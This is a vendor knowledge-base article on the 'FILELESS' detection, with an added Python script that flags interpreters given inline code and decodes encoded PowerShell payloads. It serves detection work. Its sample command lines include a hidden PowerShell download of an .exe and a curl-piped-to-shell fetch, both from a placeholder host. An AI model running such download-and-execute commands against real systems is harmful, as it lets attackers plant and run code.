Environment
- CB Cloud: All Versions
- Endpoint Standard: All Versions
Question
What does FILELESS TTP mean?
Answer
The FILELESS TTP can apply to most script interpreters, such as Python, PowerShell, Ruby, etc. Because of the wide range of interpreters, the exact details differ for each, but in essence we look for indicators that the interpreter was handed arbitrary input to execute directly from the command line rather than a script file on disk. For PowerShell, -command is one such indicator.
Additional Notes
Fileless behavior can be an indicator of compromise, but it also occurs in perfectly legitimate applications. An on-disk script that subsequently performs fileless activity follows a pattern that is also common in malicious code, so the TTP: FILELESS is appropriate in this case even though the script itself is not malicious.
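The following is an added illustration of the kind of indicator described in the Answer and the on-disk-script case in the Additional Notes; it is example code written for this page, not Carbon Black's TTP implementation. It parses a process command line, identifies the interpreter image, and flags invocations where a known inline-code flag (such as PowerShell -command or -encodedcommand, python -c, ruby -e, sh -c) is present, decoding -EncodedCommand payloads so the analyst can see what was run. The interpreter/flag table and the sample command lines are assumptions constructed for the demo.

```python
"""Illustrative fileless-indicator check over process command lines.

Added example for this page; not Carbon Black's TTP logic. The
interpreter/flag table and SAMPLE_CMDLINES are assumptions constructed
for the demo, not real telemetry.
"""
import base64
import re
import shlex
from typing import Optional

# PowerShell accepts unambiguous parameter prefixes; -e / -enc / -ec are the
# short forms of -EncodedCommand commonly seen in one-liners.
PS_INLINE = {"-command", "-c", "-encodedcommand", "-enc", "-ec", "-e"}
PS_ENCODED = {"-encodedcommand", "-enc", "-ec", "-e"}  # base64(UTF-16LE) payloads

# Interpreter image (lower case, no path, no .exe) -> flags whose argument is
# inline code rather than a script path. Assumed table; extend for your estate.
INLINE_CODE_FLAGS = {
    "powershell": PS_INLINE,
    "pwsh": PS_INLINE,
    "python": {"-c"},
    "python3": {"-c"},
    "ruby": {"-e"},
    "perl": {"-e"},
    "node": {"-e", "--eval"},
    "sh": {"-c"},
    "bash": {"-c"},
}


def image_name(token: str) -> str:
    """'C:\\...\\powershell.exe' or '/usr/bin/python3' -> 'powershell' / 'python3'."""
    name = re.split(r"[\\/]", token)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def decode_encoded_command(arg: str) -> Optional[str]:
    """-EncodedCommand carries base64 of the UTF-16LE script text; None if not decodable."""
    try:
        return base64.b64decode(arg, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_cmdline(cmdline: str) -> Optional[dict]:
    """Return a finding when an interpreter is given inline code, else None."""
    try:
        # posix=False keeps Windows backslashes literal; quotes still group tokens.
        tokens = [t.strip('"\'') for t in shlex.split(cmdline, posix=False)]
    except ValueError:
        return None  # unbalanced quotes: leave for other logic
    if not tokens:
        return None
    interp = image_name(tokens[0])
    flags = INLINE_CODE_FLAGS.get(interp)
    if not flags:
        return None  # not an interpreter we model (e.g. notepad.exe)
    for i in range(1, len(tokens) - 1):
        flag = tokens[i].lower()
        if flag in flags:
            payload = " ".join(tokens[i + 1:])  # everything after the flag is the code
            if interp in ("powershell", "pwsh") and flag in PS_ENCODED:
                decoded = decode_encoded_command(tokens[i + 1])
                if decoded is not None:
                    payload = decoded
            return {"interpreter": interp, "flag": flag, "code": payload}
    return None  # script-file invocation (-File x.ps1, python app.py): no inline code


def scan(cmdlines):
    """Return (cmdline, finding) pairs for every command line that trips the rule."""
    results = []
    for cmdline in cmdlines:
        finding = classify_cmdline(cmdline)
        if finding:
            results.append((cmdline, finding))
    return results


# Constructed samples (not real telemetry); the encoded one is built here so it decodes.
ENCODED = base64.b64encode("Write-Host hi".encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -Command "Invoke-WebRequest http://example.invalid/a -OutFile C:\Users\Public\a.exe"',
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\deploy.ps1",
    f"powershell.exe -NonInteractive -enc {ENCODED}",
    '/usr/bin/python3 -c "import os; os.system(\'id\')"',
    "python3 /opt/app/main.py --port 8080",
    '/bin/sh -c "curl http://example.invalid/x | sh"',
    r"C:\Windows\notepad.exe C:\Users\alice\notes.txt",
]

if __name__ == "__main__":
    for cmdline, finding in scan(SAMPLE_CMDLINES):
        print(f"FILELESS {finding['interpreter']} {finding['flag']}: {finding['code']}")
```

Note that the second sample (-File deploy.ps1) is not flagged by this rule because the code comes from a file on disk; it is that script's later child process, if it launches an interpreter with inline code, that would trip the rule, which is the on-disk-script case described in the Additional Notes. A real sensor also has to cope with quoting that this simple tokenizer does not model, such as cmd.exe caret escapes, so treat the parser as illustrative.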